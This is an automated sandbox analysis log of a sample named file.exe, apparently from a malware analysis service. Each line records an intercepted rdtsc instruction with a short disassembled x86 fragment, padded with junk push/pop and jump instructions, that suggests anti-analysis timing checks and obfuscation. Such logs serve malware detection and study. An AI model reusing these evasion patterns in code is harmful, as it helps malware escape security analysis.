Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F002D second address: 7F0033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F0033 second address: 7F0039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F0039 second address: 7F003D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F0197 second address: 7F019B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F065B second address: 7F065F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F065F second address: 7F0669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F0669 second address: 7F067C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C475807Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F067C second address: 7F0680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F098C second address: 7F0998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F28C4758076h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F150E second address: 7F151F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F28C47EE2B6h 0x0000000a jg 00007F28C47EE2B6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F1D6E second address: 7F1D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FC4AF second address: 7FC4C7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F28C47EE2B8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F28C47EE2BEh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FC4C7 second address: 7FC4E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C4758085h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FC4E0 second address: 7FC4EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F28C47EE2B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FC932 second address: 7FC936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FCCE6 second address: 7FCD02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FCE50 second address: 7FCE6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F28C475807Fh 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80680F second address: 806836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F28C47EE2C6h 0x0000000b popad 0x0000000c jne 00007F28C47EE2BEh 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 806836 second address: 80683A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80683A second address: 806840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 806840 second address: 80686C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F28C4758080h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F28C4758084h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804EA7 second address: 804EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804EAB second address: 804EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80540E second address: 805414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 805414 second address: 805422 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 805422 second address: 805440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edi 0x0000000a popad 0x0000000b pushad 0x0000000c jo 00007F28C47EE2B8h 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007F28C47EE2B6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 805440 second address: 805444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 805880 second address: 805884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 805884 second address: 8058B2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F28C475807Eh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F28C4758080h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8058B2 second address: 8058C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F28C47EE2B6h 0x0000000a popad 0x0000000b jno 00007F28C47EE2BCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80C313 second address: 80C317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80C317 second address: 80C31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81A65B second address: 81A65F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8207A8 second address: 8207AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82FF0D second address: 82FF13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 833A35 second address: 833A42 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 833A42 second address: 833A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F28C4758083h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 833A5F second address: 833A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 741C19 second address: 741C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 741C21 second address: 741C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 839B93 second address: 839B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F28C4758076h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 839B9F second address: 839BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 839D19 second address: 839D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 839D23 second address: 839D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83E5B4 second address: 83E5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F28C4758081h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 841058 second address: 84105E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84105E second address: 841073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F28C475807Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 841073 second address: 841079 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 841079 second address: 84107F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84107F second address: 841089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F28C47EE2B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85011B second address: 850121 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8519A5 second address: 8519A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8519A9 second address: 8519AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 851822 second address: 85183B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C47EE2C3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85183B second address: 85183F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84B853 second address: 84B857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85F9F2 second address: 85FA01 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85F68A second address: 85F697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85F697 second address: 85F69B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85F69B second address: 85F6AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85F6AE second address: 85F6CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758088h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85F6CC second address: 85F6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8754D5 second address: 875500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F28C4758081h 0x0000000d jmp 00007F28C4758082h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 875500 second address: 875504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 875504 second address: 87550C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87550C second address: 875528 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F28C47EE2C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 875528 second address: 87552C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 874468 second address: 87446E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87446E second address: 87449E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F28C475807Eh 0x0000000a pop edx 0x0000000b push edx 0x0000000c jmp 00007F28C4758087h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 874E19 second address: 874E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 874E1D second address: 874E44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F28C4758076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F28C4758085h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 874E44 second address: 874E4E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F28C47EE2B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 874E4E second address: 874E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 875016 second address: 875029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BBh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 875029 second address: 87502D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87502D second address: 875056 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C1h 0x00000007 jnp 00007F28C47EE2B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jnp 00007F28C47EE2B8h 0x00000018 pushad 0x00000019 popad 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 875056 second address: 875065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F28C4758076h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8782E2 second address: 8782E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8782E6 second address: 8782EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8782EA second address: 8782F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8782F5 second address: 87830F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F28C475807Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87AF36 second address: 87AF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C47EE2C3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87AF4E second address: 87AF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87AF54 second address: 87AF66 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F28C47EE2B6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87AF66 second address: 87AF90 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov dl, EFh 0x0000000a push 00000004h 0x0000000c mov dl, 79h 0x0000000e call 00007F28C4758079h 0x00000013 push ebx 0x00000014 jl 00007F28C475807Ch 0x0000001a je 00007F28C4758076h 0x00000020 pop ebx 0x00000021 push eax 0x00000022 push edi 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87AF90 second address: 87AFF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jc 00007F28C47EE2D4h 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 je 00007F28C47EE2C4h 0x0000001b jmp 00007F28C47EE2BEh 0x00000020 jmp 00007F28C47EE2C1h 0x00000025 popad 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d jne 00007F28C47EE2B6h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87B27D second address: 87B283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0273 second address: 4EC02A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F28C47EE2BDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC02A0 second address: 4EC02BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov ch, ABh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC02BE second address: 4EC02D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 mov dl, 5Dh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC02D0 second address: 4EC02D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC02D4 second address: 4EC02D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC02D8 second address: 4EC02DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC02DE second address: 4EC0302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0302 second address: 4EC031F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC031F second address: 4EC0324 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0324 second address: 4EC0343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F28C4758085h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0377 second address: 4EC037B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC037B second address: 4EC0381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0435 second address: 4EC0448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C47EE2BFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0448 second address: 4EC0457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0457 second address: 4EC045D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
